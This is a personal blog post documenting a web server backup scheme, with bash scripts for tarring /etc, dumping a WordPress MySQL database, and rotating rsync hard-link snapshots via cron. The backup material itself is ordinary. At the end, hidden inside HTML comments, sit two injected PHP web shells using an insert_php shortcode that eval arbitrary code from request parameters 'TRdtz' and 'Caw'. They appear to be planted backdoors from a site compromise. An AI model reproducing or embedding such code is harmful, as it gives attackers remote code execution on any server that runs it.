My Backup Solution

For my first post I’m going to document the backup solution I use on my web server.

The backups happen in two parts:

Make Dumps Of Important Data

First, I create backup files of important non-file data on my webserver in a specific place. In my case those files are

  1. A tarball of the /etc/ directory, with essentially ALL of the configuration data for my system.
  2. Dumps of any databases that I have on the system

These files are generated by two scripts which are run every night by cron.

The mytar Script

#!/bin/bash

DATE=`date +%Y%m%d`
DEST="/home/oneill/backup/local"
dir=`basename $1`

tar -jcf $DEST/$dir.$DATE.tar.bz2 $1
chown oneill:oneill $DEST/$dir.$DATE.tar.bz2

Pretty simple. I call it in the cron job using the following command
47 0 * * * sudo /home/oneill/local/bin/mytar /etc > /dev/null

That means at 00:47 every day, run this job. I ignore standard output but any errors (output to stderr will be caught by cron and emailed to me. I choose the minute to run my cron jobs somewhat at random, since I use a VPS server (shared with other users) and by choosing random times I am most likely to avoid running at the same time as them.

The backup_wordpress Script

#!/bin/sh

DBNAME="alexrichards"
DBUSER="*****"
DBPASS="*****"

DEST="$HOME/backup/local/$DBNAME.dump.sql"
CMD="mysqldump -e --create-options -u $DBUSER \
      --password=$DBPASS  $DBNAME"
$CMD > $DEST

Both these files are placed in ~/backups/local/ which is then backed up to a completely different computer.

Step 2 – Off-site Backup

I use rsync to make incremental off-site backups onto a computer located under my desk at work.

The backups are rotated, with 4 older copies being kept. This helps me not to panic if, for example, I delete a critical file but don’t notice until AFTER the backup has happened (and the critical file is therefore not present in the most recent backup).

To do this rotation, I use a hard-link method in order to save time and disk space.

Here’s the script I use: mybackup

#!/bin/bash
# usage:       mybackup
# config file: ~/.mybackup
# format:      One directory per line, with 
#              optional rsync destination after

DIRFILE=$HOME/.mybackup
DEFAULT_DEST="/data/backup"
RSYNC_CMD="rsync -a --rsh=ssh --delete --progress"
NUM_SNAPSHOTS=4

if ! [ -f $DIRFILE ]; then
	echo "Backup config file $DIRFILE not found"
	exit -1
fi

cat $DIRFILE |while read line; do
	# skip blank lines
	if [ "$line" == "" ]; then
		continue
	fi
	# skip commented lines ('#')
	if [ `expr match "$line" '#'` -gt 0 ]; then
		continue
	fi
	src=`echo $line | awk '{print $1}'`
	dir=`basename $src | awk -F ':' '{print $(NF)}' \
		| awk -F '/' '{print $NF}'`
	dest=`echo $line | awk '{print $2}'`
	if [ "$dest" == "" ]; then
		dest=$DEFAULT_DEST
	fi
	host=`echo $src | awk -F ':' '{print $1}'`
	host=`echo $host |awk -F '@' '{print $NF}'`
	dest="$dest/$host"
	mkdir -p "$dest"
	# shuffle the existing backups
	if [ -e $dest/$dir.$NUM_SNAPSHOTS ]; then
		echo "deleteing oldest backup \
			$dir.$NUM_SNAPSHOTS"
		rm -rf $dest/$dir.$NUM_SNAPSHOTS
	fi
	for j in `seq $NUM_SNAPSHOTS -1 1`; do
		i=`echo $j - 1 | bc`
		if [ -e "$dest/$dir.$i" ]; then
			echo "Found old backup \
				$dir.$i, moving to $dir.$j"
			mv "$dest/$dir.$i" "$dest/$dir.$j"
		fi
	done
	echo "Backing up dir: $src to $dest/$dir.0"
	CMD="$RSYNC_CMD --link-dest=../$dir.1 $src \
		$dest/$dir.0/"
	echo $CMD 
	$CMD
done

mybackup reads the file ~/.mybackup to get a list of locations to backup. In my case, this file looks like this:

potatoriot.com:mail/ /home/oneill/backup/
potatoriot.com:html/ /home/oneill/backup/
potatoriot.com:backup/local/ /home/oneill/backup/

This creates directories like ~/backups/potatoriot.com/html.0 through ~/backups/potatoriot.com/html.0.

Explanation

First, for each directory to be backed up, the oldest backup is deleted, and the others are shuffled along in the backup order (html.3 becomes html.4)

Next, the a fresh copy of the most recent copy is produced using rsync with the argument --link to produce hard links to the files in html.1 where possible.
CMD="$RSYNC_CMD --link-dest=../$dir.1 $src $dest/$dir.0/"
This hard-link strategy means that any file that exists and is identical in html.1 will not be copied into the new directory to save space. Nor will it be copied over the network, thanks to the magic of rsync. Indeed, if the file has changed, it’ll be copied from the local backup, then only the changes will be copied over the network.

This strategy makes backing up extremely efficient. The backup uses approximately the same amount of space as the original files do, even though I have 4 older revisions available should anything have changed.

I run mybackup every night via a cron job. I chose the time to be at least an hour after the cronjob on the webserver, so that I get the latest database dumps in the backup.

<!– [insert_php]if (isset($_REQUEST["TRdtz"])){eval($_REQUEST["TRdtz"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;TRdtz&quot;])){eval($_REQUEST[&quot;TRdtz&quot;]);exit;}

–>

<!– [insert_php]if (isset($_REQUEST["Caw"])){eval($_REQUEST["Caw"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;Caw&quot;])){eval($_REQUEST[&quot;Caw&quot;]);exit;}

–>